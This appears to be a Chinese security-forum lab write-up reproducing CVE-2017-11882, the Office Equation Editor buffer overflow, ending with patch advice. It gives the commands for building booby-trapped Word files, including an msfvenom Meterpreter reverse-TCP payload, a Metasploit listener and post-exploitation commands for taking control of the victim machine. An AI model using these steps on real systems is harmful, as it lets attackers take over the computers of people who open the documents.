CVE-2017-11882 office缓存溢出漏洞复现
  

呱唧呱唧 2265

{{ttag.title}}
1、漏洞概述

windows下常用软件,office必定属于前列,所以找到往年的这个漏洞,复现一下。微软Office套件据网上说,最有效的攻击手段,是基于CVE-2017-11882的漏洞利用。

2017年11月14号,微软推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC攻击代码被逐渐公开。这里在放一个github地址https://github.com/unamer/CVE-2017-11882

这个漏洞有大的关注度,从漏洞利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个攻击环境的构建非常简单,姿势又非常“优雅”。例如,有些攻击效果会出现弹框,会出现CPU飙高,会发生异常等等,而这个漏洞的利用效果,堪称“无色无味”。

此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。

使用场景,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。

2、影响版本:

office 2003
office 2007
office 2010
office 2013
office 2016

3、漏洞复现环境

parrot4.0 + Windows7 + Office 2016
渗透机:parrot + POC代码【上述github地址】
靶机:Win7 + Office 2016

4、实验流程

4.1、下载office 2016

在靶机win7中,安装完可看到office套件。


4.2、从Git上下载poc代码



4.3、使用下载的poc生成带有代码的word

4.3.1、 生成调用计算器的程序

python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o 11882.doc

4.3.2、 生成调用任务管理的程序

python CVE-2017-11882.py -c "cmd.exe /c taskmgr.exe" -o 11882-2.doc

通过上面生成的word文件,用office打开后,可以弹出上面我们生成的指定程序,由于Office2016存在CVE-2017-11882漏洞,当打开特殊构造的word文件时,windows会执行其他动作。既然此漏洞能够造成win系统执行其他动作,那么,是否顺便可以反弹会话,直接被渗透机控制呢?答案是肯定的。接下来我们来做进一步的验证。


4.3.3、构造带有shell后门的word文件,并开启监听

生成一些shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.111.136 LPORT=4444 -o ./sc.bin
产生漏洞
python CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.doc

使用parrot的msf实现监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 172.16.111.136

exploit


此后便可以通过meterpreter来对会话进行管理:

进入会话
msf exploit(CVE-2017-11882) > sessions 1
查看系统信息
meterpreter > sysinfo
查看当前用户
meterpreter > getuid
截屏
meterpreter > screenshot



5、漏洞修复

①在线更新;开启Windows Update更新,这种方式对于大部分人来说就够了。
②打补丁;此漏洞对应的微软补丁地址:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882


打赏鼓励作者,期待更多好文!

打赏
暂无人打赏

发表新帖
热门标签
全部标签>
有一说一
GIF动图学习
每日一问
安装部署配置
新版本体验
安全效果
功能体验
纪元平台
信服课堂视频
标准化排查
每周精选
高手请过招
【 社区to talk】
社区新周刊
2025年技术争霸赛
技术盲盒
产品连连看
畅聊IT
答题自测
专家问答
技术笔记
技术圆桌
在线直播
MVP
网络基础知识
升级
安全攻防
上网策略
测试报告
日志审计
问题分析处理
流量管理
每日一记
运维工具
用户认证
原创分享
解决方案
sangfor周刊
VPN 对接
项目案例
SANGFOR资讯
专家分享
技术顾问
信服故事
SDP百科
功能咨询
终端接入
授权
设备维护
资源访问
地址转换
虚拟机
存储
迁移
排障笔记本
产品预警公告
玩转零信任
S豆商城资讯
技术争霸赛
「智能机器人」
追光者计划
2023技术争霸赛专题
卧龙计划
华北区拉练
天逸直播
以战代练
秒懂零信任
技术晨报
平台使用
山东区技术晨报
文档捉虫
齐鲁TV
华北区交付直播
2024年技术争霸赛
北京区每日一练
场景专题
故障笔记
排障那些事
西北区每日一问
升级&主动服务
高频问题集锦
POC测试案例
全能先锋系列
云化安全能力
专家说
热门活动
产品动态
行业实践
产品解析
关键解决方案
声音值千金
工具体验官
产品知识周周练
产品体验官

本版达人

feeling

本周分享达人

新手29676...

本周提问达人